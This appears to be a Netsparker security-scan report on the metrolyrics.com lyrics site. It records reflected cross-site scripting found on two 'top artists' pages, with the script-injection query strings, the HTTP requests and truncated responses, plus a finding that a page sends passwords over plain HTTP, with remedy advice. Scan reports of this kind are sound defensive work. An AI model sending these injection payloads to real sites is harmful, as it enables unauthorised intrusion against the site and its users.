<li><a title="Hip Hop Artists" href="top-artists-hiphop.html" >Hip Hop</a></li>
<li><a title="Country Artists" href="top-artists-country.html" >Country</a></li>
<li><a title="R&amp;B Artists" href="top-artists-rb.html" >R&amp;B</a></li>
</ul>
</div>
<div id="alphabetLeft">
<h2>Browse Alphabetically</h2>
<ul>
<li><a href="artists-a.html">A</a></li>
<li><a href="artists-b.html">B</a></li>
<li><a href="artists-c.html">C</a></li>
<li><a href="artists-d.html">D</a></li>
<li><a href="artists-e.html">E</a></li>
<li><a href="artists-f.html">F</a></li>
<li><a href="artists-g.html">G</a></li>
<li><a href="artists-h.html">H</a></li>
<li><a href="artists-i.html">I</a></li>
<li><a href="artists-j.html">J</a></li>
<li><a href="artists-k.html">K</a></li>
<li><a href="artists-l.html">L</a></li>
<li><a href="artists-m.html">M</a></li>
<li><a href="artists-n.html">N</a></li>
<li><a href="artists-o.html">O</a></li>
<li><a href="artists-p.html">P</a></li>
<li><a href="artists-q.html">Q</a></li>
<li><a href="artists-r.html">R</a></li>
<li><a href="artists-s.html">S</a></li>
<li><a href="artists-t.html">T</a></li>
<li><a href="arti..
- /top-artists-pop.html

/top-artists-pop.html

http://www.metrolyrics.com/top-artists-pop.html?'"--></style></script><script>alert(0x00074F)</script>

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x00074F)</script>

Request

GET /top-artists-pop.html?'"--></style></script><script>netsparker(0x00074F)</script> HTTP/1.1
Referer: http://www.metrolyrics.com/top-artists.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.metrolyrics.com
Cookie: bblastvisit=1299460445; bbsessionhash=e10cebe70021d6be2f59d8cef6bb329f; bblastactivity=1299460453
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.3.2
Pragma: private
Content-Type: text/html; charset=utf-8
Content-Encoding:
Content-Length: 30109
Cache-Control: private, max-age=3600
Date: Mon, 07 Mar 2011 01:16:44 GMT
Connection: keep-alive
Vary: Accept-Encoding



<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:addthis="http://www.addthis.com/help/api-spec" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="classification" content="music" />
<meta name="description" content="contact us" />
<meta name="keywords" content="lyrics" />
<meta property="fb:page_id" content="81914997331" />
<title>Top Artists</title>

<link rel="icon" href="/favicon.ico" type="image/x-icon" />
<link rel="search" type="application/opensearchdescription+xml" title="metrolyrics" href="/tools/ff_search_bar.xml" />
<link href="/xml/justreleased.xml" rel="alternate" type="application/rss+xml" title="Recently Released Albums" />
<link href="/xml/futurerelease.xml" rel="alternate" type="application/rss+xml" title="Upcoming Album Releases" />
<link href="/xml/topartists.xml" rel="alternate" type="application/rss+xml" title="Top 20 Artists This Week" />
<link href="/xml/topsongs.xml" rel="alternate" type="application/rss+xml" title="Top 20 Lyrics This Week" />


<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js"></script>
<script type="text/javascript">
<!--//
//variables
var noEgg = false;
var nav={"activeTab":"artists","section":false,"sectionURL":false,"title":"Battle of the Artists"},

//Set dev server flag
is_dev = false,
//Analytics vars
_comscore = _comscore || [],
_gaq = _gaq || [];
//end analytics vars
//end variables

//start comscore tag
_comscore.push({ c1: "2", c2: "6036538", c3: "" });

(function() {
var s = document.createElement("script"), el = document.getElementsByTagName("script")[0]; s.async = true;
s.src = (document.location.protocol == "https:" ? "https://sb" : "http://b") + ".scorecardresearch.com/beacon.js";
el.parentNode.insertBefore(s, el);
})();

// Google tracking
_gaq.push(
['_setAccount', 'UA-50802-1'],
['_setCustomVar',1,"User Group ID",1,2],

['_trackPageview']
);


(function() {
var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
})();

// End Google tracking

//page specific JS

//End page specific JS
//-->
</script>

<link href="/css/g/artist-main.css" rel="stylesheet" type="text/css" media="screen" />

<!--[if IE 6]>
<script type="text/javascript" src="/js/iepngfix_tilebg.js"></script>
<![endif]-->


<script type="text/javascript">
__compete_code = '1980f0cd513fe80da3622c2ebed79163';
(function () {
var s = document.createElement('script'),
e = document.getElementsByTagName('script')[0],
t = document.location.protocol.toLowerCase() === 'https:' ?
'https://c.compete.com/bootstrap/' :
'http://c.compete.com/bootstrap/';
s.src = t + __compete_code + '/bootstrap.js';
s.type = 'text/javascript';
s.async = true;
if (e) { e.parentNode.insertBefore(s, e); }
}());
</script>

<!-- Quantcast Tag -->
<script type="text/javascript">
var _qevents = _qevents || [];

(function() {
var elem = document.createElement('script');
elem.src = (document.location.protocol == "https:" ? "https://secure" : "http://edge") + ".quantserve.com/quant.js";
elem.async = true;
elem.type = "text/javascript";
var scpt = document.getElementsByTagName('script')[0];
scpt.parentNode.insertBefore(elem, scpt);
})();

_qevents.push({
qacct:"p-c4eKHIvvd1eXQ"
});
</script>

<noscript>
<div style="display:none;">
<img src="//pixel.quantserve.com/pixel/p-c4eKHIvvd1eXQ.gif" border="0" height="1" width="1" alt="Quantcast"/>
</div>
</noscript>
<!-- End Quantcast tag -->





</head>


<!--[if IE 6 ]><body class="ie6"><![endif]-->
<!--[if IE 7 ]><body class="ie7"><![endif]-->
<!--[if gt IE 6 ]><body><![endif]-->
<!--[if !IE]><!--><body><!--<![endif]-->
<!-- ClickTale Top part -->
<script type="text/javascript">
var WRInitTime=(new Date()).getTime();
</script>
<!-- ClickTale end of Top part -->



<div id="bg-main">
<!-- Begin comScore Tag -->
<noscript>
<div style="display:none"> <img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036538&amp;c3=&amp;c4=&amp;c5=&amp;c6=&amp;c15=&amp;cj=1" alt="scorecard tracking image"/> </div>
</noscript>
<!-- End comScore Tag -->
<script type="text/javascript" src="http://gdfp.g.doubleclick.net/N6461/adj/Artist_BOA/Artist_BOA_top_1x1;tile=1;genre=pop;sz=1x1;ord=1299460603?"></script>

<div id="header">

<h1>Top Artists</h1>

<div id="hdr-scroll">
<div id="hdr-scrollmenu">
<script type="text/javascript">var addthis_config = {ui_hover_direction: -1, data_ga_property: 'UA-50802-1', "data_track_clickback":true};</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=metroleap"></script>
<ul>
<li class="first"><img src="http://misc.ml-cdn.com/images/n2/loading_inline.gif" alt="Loading..." /></li>
</ul>
</div>
<div id="hdr-scrollsearch">
<form action="/search.php" method="get">
<input type="text" name="search" onclick="_gaq.push(['_trackEvent', 'Search', 'Header Dropdown Click']);if (this.value == 'Search ...') this.value=''" value="Search ..." onblur="if(this.value == '') this.value='Search ...'" id="hdr-scrollsearchip" />
<input type="hidden" name="category" value="artisttitle" />
<input type="submit" name="" value="Search" id="hdr-scrollsearchbtn" />
</form>
</div>
</div>
<div id="headertop">
<div class="headerwrap">
<ul id="navmain">
<li id="hdr-lyrics" class="navprimaryli" data-tabname="lyrics">
<a href="/" class="navprimarya" title="Lyrics" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Top Nav Button Click', 'Lyrics']);"><span></span>Lyrics</a>
<div id="hdr-sub-lyrics" class="hdr-sub hdr-subhover container_6">
<img class="tabLoad" src="http://misc.ml-cdn.com/images/n2/tabLoad.gif" alt="Loading..." />
</div>
</li>
<li id="hdr-artists" class="navprimaryli" data-tabname="artists">
<a href="/top-artists.html" title="Artists" class="navprimarya" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Top Nav Button Click', 'Artists']);"><span></span>Artists</a>
<div id="hdr-sub-artists" class="hdr-sub hdr-subhover container_6">
<img class="tabLoad" src="http://misc.ml-cdn.com/images/n2/tabLoad.gif" alt="Loading..." />
</div>
</li>
<li id="hdr-soundtracks" class="navprimaryli" data-tabname="soundtracks">
<a href="/soundtracks.html" title="soundtracks" class="navprimarya" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Top Nav Button Click', 'Soundtracks']);"><span></span>Soundtracks</a>
<div id="hdr-sub-soundtracks" class="hdr-sub hdr-subhover container_6">
<img class="tabLoad" src="http://misc.ml-cdn.com/images/n2/tabLoad.gif" alt="Loading..." />
</div>
</li>
<li id="hdr-news" class="navprimaryli" data-tabname="news">
<a href="/news.html" title="News" class="navprimarya" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Top Nav Button Click', 'News']);"><span></span>News</a>
<div id="hdr-sub-news" class="hdr-sub hdr-subhover container_6">
<img class="tabLoad" src="http://misc.ml-cdn.com/images/n2/tabLoad.gif" alt="Loading..." />
</div>
</li>
<li id="hdr-apps" class="navprimaryli" data-tabname="apps">
<a href="/apps.html" title="Apps" class="navprimarya" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Top Nav Button Click', 'Apps']);"><span></span>Apps</a>
<div id="hdr-sub-apps" class="hdr-sub hdr-subhover container_6">
<img class="tabLoad" src="http://misc.ml-cdn.com/images/n2/tabLoad.gif" alt="Loading..." />
</div>
</li>
<li id="hdr-forum" class="navprimaryli" data-tabname="forum">
<a href="/forum/" title="Forum" class="navprimarya" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Top Nav Button Click', 'Forum']);"><span></span>Forum</a>
<div id="hdr-sub-forum" class="hdr-sub hdr-subhover container_6">
<img class="tabLoad" src="http://misc.ml-cdn.com/images/n2/tabLoad.gif" alt="Loading..." />
</div>
</li>
<li id="hdr-driver" class="navprimaryli">
<a href="http://itunes.apple.com/us/app/metrolyrics-pro/id370144420?mt=8" target="_blank" rel="nofollow" title="Get our iPhone App" class="navprimarya" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Driver Click', 'metrolyrics Pro App']);">Contests</a>
</li>
</ul>
<ul id="myml">

<li class="navprimaryli"><a href="/request.php" title="My MetroLyrics" onclick="_gaq.push(['_trackEvent', 'Navigation', 'My MetroLyrics', 'Not logged in']);">My MetroLyrics<span></span></a></li>
<li class="navprimaryli"><div id="fb_login_btn"><fb:login-button size="small" perms="email"></fb:login-button></div><div id="fb-root"></div></li>
<li class="myml-alt myml-altfirst navprimaryli"><a href="/register.php" title="Sign Up for MetroLyrics" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Sign Up']);">Sign Up</a></li>
<li class="myml-alt navprimaryli"><a rel="nofollow" id="login_link" class="iframe" href="/login.php" title="Login" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Log In']);">Log In</a></li>

</ul>
</div>
</div>

<div id="headermid">
<div class="headerwrap">

<div id="headerlogo"><a href="/" title="Home">MetroLyrics</a></div>
<div id="headersearch">
<form method="get" action="/search.php">
<input type="hidden" name="category" value="artisttitle" />
<input type="text" name="search" onclick="if (this.value == 'Find Your Lyrics, Artists, Videos, more...') this.value='';_gaq.push(['_trackEvent', 'Search', 'Header Main Click']);" value="Find Your Lyrics, Artists, Videos, more..." onblur="if(this.value == '') this.value='Find Your Lyrics, Artists, Videos, more...'" id="hdr-ipsearch" />
<input type="hidden" name="category" value="artisttitle" />
<input type="submit" name="" value="Search" id="hdr-btnsearch" />
</form>
<p id="hdr-browse"></p>
</div>

</div>
</div>

<div id="headerbot">
<div class="headerwrap">

<p id="breadcrumbs">
<a href="/" id="bc-home" title="Home">Home</a> &raquo;
<a href="#" id="bc-tab"></a>
</p>
</div>
</div>

<div id="headerad">
<div id="hdrleaderboard">
<script type="text/javascript" src="http://gdfp.g.doubleclick.net/N6461/adj/Artist_BOA/Artist_BOA_top_728x90;tile=2;genre=pop;sz=728x90;ord=1299460603?"></script>
</div>
<div id="hdrsocial">
<div class="addthis_default_style">
<a class="addthis_button_facebook_like" fb:like:layout="box_count" fb:like:width="48" fb:like:height="63" addthis:url="http://www.facebook.com/metrolyrics"></a>
<a class="addthis_button_tweet" tw:count="vertical" addthis:url="http://www.metrolyrics.com"></a>
<a class="addthis_counter"></a>
</div>
</div>
</div>

<div id="headercta"><a href="/register.php" title="Join MetroLyrics" onclick="_gaq.push(['_trackEvent', 'Header', 'Join Community Image']);">Join the MetroLyrics Community Today!</a></div>

</div>

<div id="main">


<div id="LRcolumns">
<div id="left">
<div id="Acolumn">
<div id="navLeft">
<h2>Music Genres</h2>
<ul>
<li><a title="Top Artists" href="top-artists.html" >Top Artists</a></li>
<li><a title="Pop Artists" href="top-artists-pop.html" class="on">Pop</a></li>
<li><a title="Rock Artists" href="top-artists-rock.html" >Rock</a></li>
<li><a title="Hip Hop Artists" href="top-artists-hiphop.html" >Hip Hop</a></li>
<li><a title="Country Artists" href="top-artists-country.html" >Country</a></li>
<li><a title="R&amp;B Artists" href="top-artists-rb.html" >R&amp;B</a></li>
</ul>
</div>
<div id="alphabetLeft">
<h2>Browse Alphabetically</h2>
<ul>
<li><a href="artists-a.html">A</a></li>
<li><a href="artists-b.html">B</a></li>
<li><a href="artists-c.html">C</a></li>
<li><a href="artists-d.html">D</a></li>
<li><a href="artists-e.html">E</a></li>
<li><a href="artists-f.html">F</a></li>
<li><a href="artists-g.html">G</a></li>
<li><a href="artists-h.html">H</a></li>
<li><a href="artists-i.html">I</a></li>
<li><a href="artists-j.html">J</a></li>
<li><a href="artists-k.html">K</a></li>
<li><a href="artists-l.html">L</a></li>
<li><a href="artists-m.html">M</a></li>
<li><a href="artists-n.html">N</a></li>
<li><a href="artists-o.html">O</a></li>
<li><a href="artists-p.html">P</a></li>
<li><a href="artists-q.html">Q</a></li>
<li><a href="artists-r.html">R</a></li>
<li><a href="artists-s.html">S</a></li>
<li><a href="artists-t.html">T</a></li>
<li><a href="artists-u.html"&..
- /top-artists-rock.html

/top-artists-rock.html

http://www.metrolyrics.com/top-artists-rock.html?'"--></style></script><script>alert(0x000753)</script>

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x000753)</script>

Request

GET /top-artists-rock.html?'"--></style></script><script>netsparker(0x000753)</script> HTTP/1.1
Referer: http://www.metrolyrics.com/top-artists.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.metrolyrics.com
Cookie: bblastvisit=1299460445; bbsessionhash=e10cebe70021d6be2f59d8cef6bb329f; bblastactivity=1299460453
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: LiteSpeed
X-Powered-By: PHP/5.3.2
Pragma: private
Content-Type: text/html; charset=utf-8
Content-Encoding:
Content-Length: 15130
Cache-Control: private, max-age=3600
Date: Mon, 07 Mar 2011 01:16:43 GMT
Connection: keep-alive
Vary: Accept-Encoding



<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:addthis="http://www.addthis.com/help/api-spec" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="classification" content="music" />
<meta name="description" content="contact us" />
<meta name="keywords" content="lyrics" />
<meta property="fb:page_id" content="81914997331" />
<title>Top Artists</title>

<link rel="icon" href="/favicon.ico" type="image/x-icon" />
<link rel="search" type="application/opensearchdescription+xml" title="metrolyrics" href="/tools/ff_search_bar.xml" />
<link href="/xml/justreleased.xml" rel="alternate" type="application/rss+xml" title="Recently Released Albums" />
<link href="/xml/futurerelease.xml" rel="alternate" type="application/rss+xml" title="Upcoming Album Releases" />
<link href="/xml/topartists.xml" rel="alternate" type="application/rss+xml" title="Top 20 Artists This Week" />
<link href="/xml/topsongs.xml" rel="alternate" type="application/rss+xml" title="Top 20 Lyrics This Week" />


<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js"></script>
<script type="text/javascript">
<!--//
//variables
var noEgg = false;
var nav={"activeTab":"artists","section":false,"sectionURL":false,"title":"Battle of the Artists"},

//Set dev server flag
is_dev = false,
//Analytics vars
_comscore = _comscore || [],
_gaq = _gaq || [];
//end analytics vars
//end variables

//start comscore tag
_comscore.push({ c1: "2", c2: "6036538", c3: "" });

(function() {
var s = document.createElement("script"), el = document.getElementsByTagName("script")[0]; s.async = true;
s.src = (document.location.protocol == "https:" ? "https://sb" : "http://b") + ".scorecardresearch.com/beacon.js";
el.parentNode.insertBefore(s, el);
})();

// Google tracking
_gaq.push(
['_setAccount', 'UA-50802-1'],
['_setCustomVar',1,"User Group ID",1,2],

['_trackPageview']
);


(function() {
var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
})();

// End Google tracking

//page specific JS

//End page specific JS
//-->
</script>

<link href="/css/g/artist-main.css" rel="stylesheet" type="text/css" media="screen" />

<!--[if IE 6]>
<script type="text/javascript" src="/js/iepngfix_tilebg.js"></script>
<![endif]-->


<script type="text/javascript">
__compete_code = '1980f0cd513fe80da3622c2ebed79163';
(function () {
var s = document.createElement('script'),
e = document.getElementsByTagName('script')[0],
t = document.location.protocol.toLowerCase() === 'https:' ?
'https://c.compete.com/bootstrap/' :
'http://c.compete.com/bootstrap/';
s.src = t + __compete_code + '/bootstrap.js';
s.type = 'text/javascript';
s.async = true;
if (e) { e.parentNode.insertBefore(s, e); }
}());
</script>

<!-- Quantcast Tag -->
<script type="text/javascript">
var _qevents = _qevents || [];

(function() {
var elem = document.createElement('script');
elem.src = (document.location.protocol == "https:" ? "https://secure" : "http://edge") + ".quantserve.com/quant.js";
elem.async = true;
elem.type = "text/javascript";
var scpt = document.getElementsByTagName('script')[0];
scpt.parentNode.insertBefore(elem, scpt);
})();

_qevents.push({
qacct:"p-c4eKHIvvd1eXQ"
});
</script>

<noscript>
<div style="display:none;">
<img src="//pixel.quantserve.com/pixel/p-c4eKHIvvd1eXQ.gif" border="0" height="1" width="1" alt="Quantcast"/>
</div>
</noscript>
<!-- End Quantcast tag -->





</head>


<!--[if IE 6 ]><body class="ie6"><![endif]-->
<!--[if IE 7 ]><body class="ie7"><![endif]-->
<!--[if gt IE 6 ]><body><![endif]-->
<!--[if !IE]><!--><body><!--<![endif]-->
<!-- ClickTale Top part -->
<script type="text/javascript">
var WRInitTime=(new Date()).getTime();
</script>
<!-- ClickTale end of Top part -->



<div id="bg-main">
<!-- Begin comScore Tag -->
<noscript>
<div style="display:none"> <img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036538&amp;c3=&amp;c4=&amp;c5=&amp;c6=&amp;c15=&amp;cj=1" alt="scorecard tracking image"/> </div>
</noscript>
<!-- End comScore Tag -->
<script type="text/javascript" src="http://gdfp.g.doubleclick.net/N6461/adj/Artist_BOA/Artist_BOA_top_1x1;tile=1;genre=rock;sz=1x1;ord=1299460603?"></script>

<div id="header">

<h1>Top Artists</h1>

<div id="hdr-scroll">
<div id="hdr-scrollmenu">
<script type="text/javascript">var addthis_config = {ui_hover_direction: -1, data_ga_property: 'UA-50802-1', "data_track_clickback":true};</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=metroleap"></script>
<ul>
<li class="first"><img src="http://misc.ml-cdn.com/images/n2/loading_inline.gif" alt="Loading..." /></li>
</ul>
</div>
<div id="hdr-scrollsearch">
<form action="/search.php" method="get">
<input type="text" name="search" onclick="_gaq.push(['_trackEvent', 'Search', 'Header Dropdown Click']);if (this.value == 'Search ...') this.value=''" value="Search ..." onblur="if(this.value == '') this.value='Search ...'" id="hdr-scrollsearchip" />
<input type="hidden" name="category" value="artisttitle" />
<input type="submit" name="" value="Search" id="hdr-scrollsearchbtn" />
</form>
</div>
</div>
<div id="headertop">
<div class="headerwrap">
<ul id="navmain">
<li id="hdr-lyrics" class="navprimaryli" data-tabname="lyrics">
<a href="/" class="navprimarya" title="Lyrics" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Top Nav Button Click', 'Lyrics']);"><span></span>Lyrics</a>
<div id="hdr-sub-lyrics" class="hdr-sub hdr-subhover container_6">
<img class="tabLoad" src="http://misc.ml-cdn.com/images/n2/tabLoad.gif" alt="Loading..." />
</div>
</li>
<li id="hdr-artists" class="navprimaryli" data-tabname="artists">
<a href="/top-artists.html" title="Artists" class="navprimarya" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Top Nav Button Click', 'Artists']);"><span></span>Artists</a>
<div id="hdr-sub-artists" class="hdr-sub hdr-subhover container_6">
<img class="tabLoad" src="http://misc.ml-cdn.com/images/n2/tabLoad.gif" alt="Loading..." />
</div>
</li>
<li id="hdr-soundtracks" class="navprimaryli" data-tabname="soundtracks">
<a href="/soundtracks.html" title="soundtracks" class="navprimarya" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Top Nav Button Click', 'Soundtracks']);"><span></span>Soundtracks</a>
<div id="hdr-sub-soundtracks" class="hdr-sub hdr-subhover container_6">
<img class="tabLoad" src="http://misc.ml-cdn.com/images/n2/tabLoad.gif" alt="Loading..." />
</div>
</li>
<li id="hdr-news" class="navprimaryli" data-tabname="news">
<a href="/news.html" title="News" class="navprimarya" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Top Nav Button Click', 'News']);"><span></span>News</a>
<div id="hdr-sub-news" class="hdr-sub hdr-subhover container_6">
<img class="tabLoad" src="http://misc.ml-cdn.com/images/n2/tabLoad.gif" alt="Loading..." />
</div>
</li>
<li id="hdr-apps" class="navprimaryli" data-tabname="apps">
<a href="/apps.html" title="Apps" class="navprimarya" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Top Nav Button Click', 'Apps']);"><span></span>Apps</a>
<div id="hdr-sub-apps" class="hdr-sub hdr-subhover container_6">
<img class="tabLoad" src="http://misc.ml-cdn.com/images/n2/tabLoad.gif" alt="Loading..." />
</div>
</li>
<li id="hdr-forum" class="navprimaryli" data-tabname="forum">
<a href="/forum/" title="Forum" class="navprimarya" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Top Nav Button Click', 'Forum']);"><span></span>Forum</a>
<div id="hdr-sub-forum" class="hdr-sub hdr-subhover container_6">
<img class="tabLoad" src="http://misc.ml-cdn.com/images/n2/tabLoad.gif" alt="Loading..." />
</div>
</li>
<li id="hdr-driver" class="navprimaryli">
<a href="http://itunes.apple.com/us/app/metrolyrics-pro/id370144420?mt=8" target="_blank" rel="nofollow" title="Get our iPhone App" class="navprimarya" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Driver Click', 'metrolyrics Pro App']);">Contests</a>
</li>
</ul>
<ul id="myml">

<li class="navprimaryli"><a href="/request.php" title="My MetroLyrics" onclick="_gaq.push(['_trackEvent', 'Navigation', 'My MetroLyrics', 'Not logged in']);">My MetroLyrics<span></span></a></li>
<li class="navprimaryli"><div id="fb_login_btn"><fb:login-button size="small" perms="email"></fb:login-button></div><div id="fb-root"></div></li>
<li class="myml-alt myml-altfirst navprimaryli"><a href="/register.php" title="Sign Up for MetroLyrics" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Sign Up']);">Sign Up</a></li>
<li class="myml-alt navprimaryli"><a rel="nofollow" id="login_link" class="iframe" href="/login.php" title="Login" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Log In']);">Log In</a></li>

</ul>
</div>
</div>

<div id="headermid">
<div class="headerwrap">

<div id="headerlogo"><a href="/" title="Home">MetroLyrics</a></div>
<div id="headersearch">
<form method="get" action="/search.php">
<input type="hidden" name="category" value="artisttitle" />
<input type="text" name="search" onclick="if (this.value == 'Find Your Lyrics, Artists, Videos, more...') this.value='';_gaq.push(['_trackEvent', 'Search', 'Header Main Click']);" value="Find Your Lyrics, Artists, Videos, more..." onblur="if(this.value == '') this.value='Find Your Lyrics, Artists, Videos, more...'" id="hdr-ipsearch" />
<input type="hidden" name="category" value="artisttitle" />
<input type="submit" name="" value="Search" id="hdr-btnsearch" />
</form>
<p id="hdr-browse"></p>
</div>

</div>
</div>

<div id="headerbot">
<div class="headerwrap">

<p id="breadcrumbs">
<a href="/" id="bc-home" title="Home">Home</a> &raquo;
<a href="#" id="bc-tab"></a>
</p>
</div>
</div>

<div id="headerad">
<div id="hdrleaderboard">
<script type="text/javascript" src="http://gdfp.g.doubleclick.net/N6461/adj/Artist_BOA/Artist_BOA_top_728x90;tile=2;genre=rock;sz=728x90;ord=1299460603?"></script>
</div>
<div id="hdrsocial">
<div class="addthis_default_style">
<a class="addthis_button_facebook_like" fb:like:layout="box_count" fb:like:width="48" fb:like:height="63" addthis:url="http://www.facebook.com/metrolyrics"></a>
<a class="addthis_button_tweet" tw:count="vertical" addthis:url="http://www.metrolyrics.com"></a>
<a class="addthis_counter"></a>
</div>
</div>
</div>

<div id="headercta"><a href="/register.php" title="Join MetroLyrics" onclick="_gaq.push(['_trackEvent', 'Header', 'Join Community Image']);">Join the MetroLyrics Community Today!</a></div>

</div>

<div id="main">


<div id="LRcolumns">
<div id="left">
<div id="Acolumn">
<div id="navLeft">
<h2>Music Genres</h2>
<ul>
<li><a title="Top Artists" href="top-artists.html" >Top Artists</a></li>
<li><a title="Pop Artists" href="top-artists-pop.html" >Pop</a></li>
<li><a title="Rock Artists" href="top-artists-rock.html" class="on">Rock</a></li>
<li><a title="Hip Hop Artists" href="top-artists-hiphop.html" >Hip Hop</a></li>
<li><a title="Country Artists" href="top-artists-country.html" >Country</a></li>
<li><a title="R&amp;B Artists" href="top-artists-rb.html" >R&amp;B</a></li>
</ul>
</div>
<div id="alphabetLeft">
<h2>Browse Alphabetically</h2>
<ul>
<li><a href="artists-a.html">A</a></li>
<li><a href="artists-b.html">B</a></li>
<li><a href="artists-c.html">C</a></li>
<li><a href="artists-d.html">D</a></li>
<li><a href="artists-e.html">E</a></li>
<li><a href="artists-f.html">F</a></li>
<li><a href="artists-g.html">G</a></li>
<li><a href="artists-h.html">H</a></li>
<li><a href="artists-i.html">I</a></li>
<li><a href="artists-j.html">J</a></li>
<li><a href="artists-k.html">K</a></li>
<li><a href="artists-l.html">L</a></li>
<li><a href="artists-m.html">M</a></li>
<li><a href="artists-n.html">N</a></li>
<li><a href="artists-o.html">O</a></li>
<li><a href="artists-p.html">P</a></li>
<li><a href="artists-q.html">Q</a></li>
<li><a href="artists-r.html">R</a></li>
<li><a href="artists-s.html">S</a></li>
<li><a href="artists-t.html">T</a></li>
<li><a href=&q..
Password Transmitted Over HTTP

Password Transmitted Over HTTP

1 TOTAL
IMPORTANT
CONFIRMED
1
Netsparker identified that password data is sent over HTTP.

Impact

If an attacker can intercept network traffic he/she can steal users credentials.

Actions to Take

  1. See the remedy for solution.
  2. Move all of your critical forms and pages to HTTPS and do not serve them over HTTP.

Remedy

All sensitive data should be transferred over HTTPS rather than HTTP. Forms should be served over HTTPS. All aspects of the application that accept user input starting from the login process should only be served over HTTPS.
- /request.php

/request.php CONFIRMED

http://www.metrolyrics.com/request.php

Form target action

mshtml.HTMLInputElementClass

Request

GET /request.php HTTP/1.1
Referer: http://www.metrolyrics.com/login.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.metrolyrics.com
Cookie: bblastvisit=1299460374
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: LiteSpeed
X-Powered-By: PHP/5.3.2
Pragma: private
Content-Type: text/html; charset=utf-8
Content-Encoding:
Content-Length: 5970
Vary: Accept-Encoding
Cache-Control: private, max-age=3600
Date: Mon, 07 Mar 2011 01:12:55 GMT
Connection: keep-alive



<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:addthis="http://www.addthis.com/help/api-spec" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="classification" content="music" />
<meta name="description" content="Membership is required for this function" />
<meta name="keywords" content="lyrics" />
<meta property="fb:page_id" content="81914997331" />
<title>Membership Required For This Function</title>

<link rel="icon" href="/favicon.ico" type="image/x-icon" />
<link rel="search" type="application/opensearchdescription+xml" title="metrolyrics" href="/tools/ff_search_bar.xml" />
<link href="/xml/justreleased.xml" rel="alternate" type="application/rss+xml" title="Recently Released Albums" />
<link href="/xml/futurerelease.xml" rel="alternate" type="application/rss+xml" title="Upcoming Album Releases" />
<link href="/xml/topartists.xml" rel="alternate" type="application/rss+xml" title="Top 20 Artists This Week" />
<link href="/xml/topsongs.xml" rel="alternate" type="application/rss+xml" title="Top 20 Lyrics This Week" />


<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js"></script>
<script type="text/javascript">
<!--//
//variables
var noEgg = false;
var nav={"activeTab":"lyrics","section":false,"sectionURL":false,"title":"Membership Required"},

//Set dev server flag
is_dev = false,
//Analytics vars
_comscore = _comscore || [],
_gaq = _gaq || [];
//end analytics vars
//end variables

//start comscore tag
_comscore.push({ c1: "2", c2: "6036538", c3: "" });

(function() {
var s = document.createElement("script"), el = document.getElementsByTagName("script")[0]; s.async = true;
s.src = (document.location.protocol == "https:" ? "https://sb" : "http://b") + ".scorecardresearch.com/beacon.js";
el.parentNode.insertBefore(s, el);
})();

